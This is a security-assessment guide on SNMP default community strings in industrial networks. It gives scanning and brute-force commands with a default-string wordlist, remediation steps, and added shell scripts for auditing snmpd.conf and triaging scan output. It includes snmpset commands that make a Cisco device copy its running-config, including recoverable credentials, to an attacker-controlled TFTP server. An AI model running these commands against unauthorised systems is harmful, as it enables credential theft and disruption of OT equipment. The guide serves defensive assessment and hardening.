SNMP Default Community Strings
SNMP v1 and v2c authenticate the entire protocol with a single shared string
sent in the clear. Hardware ships with default strings (public read,
private read-write), every vendor knows this, and somehow every OT
environment still has a list of devices answering to them.
This page is the 15-minute check.
What you can do with public
Read everything the device exposes — and on industrial hardware that includes:
- System uptime, firmware version (CVE selection trivial)
- Interface table → topology mapping
- ARP table → adjacent IPs you didn’t know about
- Routing table → reachable networks
- Process listing (some Linux-based PLCs)
- Currently-logged-in user accounts (HP printers, some switches)
- USB device tree (Cisco, Juniper)
- Wireless SSIDs and PSKs (some Aruba/Cisco firmware)
What you can do with private
Everything public lets you read, plus write — change the running
config:
# Read entire config from a Cisco device
snmpwalk -v2c -c public target 1.3.6.1.4.1.9.9.96
# Force the device to copy running-config to a TFTP server you control
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.2.1 i 1
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.3.1 i 4
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.4.1 i 1
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a "10.10.10.5"
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.6.1 s "config.txt"
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.14.1 i 1
Now you have the running config, including any local credentials hashed with weak Cisco type-7 (recoverable).
Network gear writeable over SNMP private is full-config exfil in 10
seconds and persistent backdoor in 30. Treat default community strings on
any switch, router, firewall, or industrial gateway as an immediate
finding.
Finding everything in 15 minutes
Nmap
nmap -sU -p 161 --script "snmp-brute,snmp-info,snmp-sysdescr,snmp-interfaces,snmp-processes,snmp-win32-software" 10.20.0.0/16
snmp-brute runs through the default community list. The ones that respond
are the immediate findings.
onesixtyone (faster sweep)
onesixtyone -c community-list.txt -i hosts.txt -o findings.txt
community-list.txt — at minimum:
public
private
admin
manager
cisco
default
guest
read
write
test
0
1
agent
snmpd
Vendor-specific additions: community (HP), OrigEquipMfr (Brocade),
tivoli (IBM), ILMI (Cisco ATM).
snmpwalk (interactive)
snmpwalk -v2c -c public target system # device info
snmpwalk -v2c -c public target interfaces # NIC table → topology
snmpwalk -v2c -c public target ip # routing + ARP
snmpwalk -v2c -c public target tcp # listening ports
Common OT-specific gotchas
- HMI / SCADA endpoints (Wonderware, Citect, GE iFix) often listen on SNMP with public. Look for vendor-specific OIDs once the string is confirmed.
- Modbus gateways (Schneider, Moxa, Westermo) — SNMP public reveals the serial backend and slave IDs, which is half of a Modbus exploit chain.
- Print/MFP devices (HP JetDirect, Xerox, Canon) — SNMP public/private is on by default for years post-install. Yes, in OT, the printer in the control room is in scope.
- UPS / PDU (APC, Eaton, Tripp Lite) — private lets you reboot or power off devices remotely. In an OT environment, that is loss-of-view.
The fix (priority order)
- Disable SNMPv1 and SNMPv2c everywhere. Use SNMPv3 with authPriv (SHA + AES at minimum).
- If SNMPv2c cannot be disabled (legacy device with no v3 support):
  - Change the community string to a random ≥ 24-char value
  - Restrict SNMP by source IP at the management interface and on the network
  - Disable write community entirely; never use private-equivalent
- Move SNMP off the OT VLAN entirely. The polling host belongs in a management VLAN that reaches OT through a firewall rule scoped to UDP/161 from the monitoring server only.
- Egress filtering — SNMP traps should leave only through the management VLAN. Stop them at the perimeter.
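The priority list above, turned into a check you can run against a net-snmp snmpd.conf before a device goes back on the OT VLAN. This is an added example, not code from the original page or from the net-snmp project: the audit_snmpd_conf function, the tag names it prints, and the three sample configs are constructed here. The directive names it looks for (rocommunity, rwcommunity, com2sec, createUser, rouser, rwuser, agentAddress) are real net-snmp directives.

```shell
#!/bin/sh
# Added example: audit a net-snmp snmpd.conf against the fix list above.
# Prints one finding per weak directive; prints nothing for a clean file.

# Default strings from the list on this page, plus the vendor extras.
DEFAULT_COMMUNITIES="public private admin manager cisco default guest read write test 0 1 agent snmpd community OrigEquipMfr tivoli ILMI"

audit_snmpd_conf() {
  # Reads snmpd.conf on stdin. Comments are stripped, so a passphrase
  # containing '#' would need more quoting than this sample handles.
  awk -v defaults="$DEFAULT_COMMUNITIES" '
    BEGIN { n = split(defaults, d, " "); for (i = 1; i <= n; i++) isdef[d[i]] = 1 }
    { sub(/#.*/, ""); if (NF == 0) next }
    # rocommunity/rwcommunity STRING [SOURCE]: v1/v2c, so always a finding
    $1 ~ /^r[ow]community6?$/ {
      tags = "v1v2c"
      if ($1 ~ /^rw/)                 tags = tags ",write-access"
      if ($2 in isdef)                tags = tags ",default-string"
      if (NF < 3 || $3 == "default")  tags = tags ",any-source"
      print $0 " -> " tags; next
    }
    # com2sec NAME SOURCE COMMUNITY: the long-form v1/v2c mapping
    $1 == "com2sec" {
      tags = "v1v2c"
      if ($4 in isdef)       tags = tags ",default-string"
      if ($3 == "default")   tags = tags ",any-source"
      print $0 " -> " tags; next
    }
    # rouser/rwuser USER [noauth|auth|priv]: anything short of priv is not authPriv
    $1 ~ /^r[ow]user$/ && $3 != "priv" { print $0 " -> v3-not-authpriv"; next }
    # createUser USER SHA PASS AES PASS: MD5/DES or a missing privacy half is weak
    $1 == "createUser" && (NF < 5 || $3 == "MD5" || $5 == "DES") {
      print $0 " -> v3-weak-or-no-privacy"; next
    }
  '
}

count_findings() { audit_snmpd_conf | awk 'END { print NR }'; }

# Constructed sample 1: how a lot of boxes ship (two findings).
WEAK_CONF=$(cat <<'EOF'
rocommunity public
rwcommunity private
EOF
)

# Constructed sample 2: the v2c fallback from the list (one finding, v1v2c only).
LEGACY_CONF=$(cat <<'EOF'
rocommunity Kq7vP2xT9mZ4bW8nR3cJ6hL1 10.20.99.5
EOF
)

# Constructed sample 3: SNMPv3 authPriv only, bound to the management VLAN address.
HARDENED_CONF=$(cat <<'EOF'
createUser ot_poller SHA CHANGE-ME-AUTH-PASSPHRASE AES CHANGE-ME-PRIV-PASSPHRASE
rouser ot_poller priv
agentAddress udp:10.20.99.5:161
EOF
)

for name in WEAK_CONF LEGACY_CONF HARDENED_CONF; do
  eval "conf=\$$name"
  echo "== $name =="
  printf '%s\n' "$conf" | audit_snmpd_conf
done
```

Run it against a real file with `audit_snmpd_conf < /etc/snmp/snmpd.conf`. The legacy sample still produces a v1v2c finding on purpose: a random string and a source restriction lower the risk, but the fallback in the list above is a compensating control, not a fix, and the audit should keep saying so.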
Quick check on your own estate
# IT side
nmap -sU -p 161 --script snmp-brute corporate-cidr/16
# OT side (only with change-window + read-only mode)
onesixtyone -c short-list.txt -i ot-devices.txt
Any host that answers public is in your next-engagement findings.
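For the onesixtyone sweep above and for this estate check, a triage pass that ranks its output so the write-capable defaults and the OT boxes surface first. This is an added example, not code from the original page or from onesixtyone. It assumes onesixtyone's `host [community] sysDescr` output line format; the severity names, the vendor keyword list and the sample scan lines are constructed here.

```shell
#!/bin/sh
# Added example: triage onesixtyone output into a ranked findings list.
# Assumes onesixtyone's line format:  host [community] sysDescr

# Strings that ship read-write on most gear (per the lists above).
WRITE_DEFAULTS="private write"
# The full default list from this page plus the vendor extras.
DEFAULT_COMMUNITIES="public private admin manager cisco default guest read write test 0 1 agent snmpd community OrigEquipMfr tivoli ILMI"
# Vendor keywords from the OT gotchas above; matched case-insensitively against sysDescr.
OT_VENDORS="moxa|schneider|westermo|apc|eaton|tripp|wonderware|citect|ifix"

triage_onesixtyone() {
  # stdin: onesixtyone output. stdout: SEVERITY host community [ot-device], worst first.
  awk -v writes="$WRITE_DEFAULTS" -v defaults="$DEFAULT_COMMUNITIES" -v ot="$OT_VENDORS" '
    BEGIN {
      n = split(writes, w, " ");   for (i = 1; i <= n; i++) isw[w[i]] = 1
      n = split(defaults, d, " "); for (i = 1; i <= n; i++) isd[d[i]] = 1
    }
    match($0, /\[[^]]+\]/) {
      host = $1
      comm = substr($0, RSTART + 1, RLENGTH - 2)
      desc = tolower(substr($0, RSTART + RLENGTH))
      if (comm in isw)      { rank = 1; sev = "CRITICAL" }   # write-capable default
      else if (comm in isd) { rank = 2; sev = "HIGH" }       # read default
      else                  { rank = 3; sev = "MEDIUM" }     # custom string, still v2c
      tag = (desc ~ ot) ? " ot-device" : ""
      print rank, sev, host, comm tag
    }' | sort -k1,1n -k3,3 | cut -d" " -f2-
}

# Constructed sample sweep output (not a real scan).
SAMPLE_SCAN=$(cat <<'EOF'
10.20.1.7 [public] Cisco IOS Software (constructed sysDescr)
10.20.1.7 [private] Cisco IOS Software (constructed sysDescr)
10.20.3.22 [public] Moxa MGate Modbus gateway (constructed sysDescr)
10.20.5.3 [public] APC Network Management Card (constructed sysDescr)
10.20.9.40 [Kq7vP2xT9mZ4bW8nR3cJ6hL1] HP JetDirect (constructed sysDescr)
EOF
)

printf '%s\n' "$SAMPLE_SCAN" | triage_onesixtyone
```

On a real sweep, `triage_onesixtyone < findings.txt` gives the order to work the list in: a CRITICAL line is a write community on the wire, a HIGH line tagged ot-device is the Modbus gateway or UPS case from the gotchas, and a MEDIUM line is a device that at least had its string changed but is still on v2c.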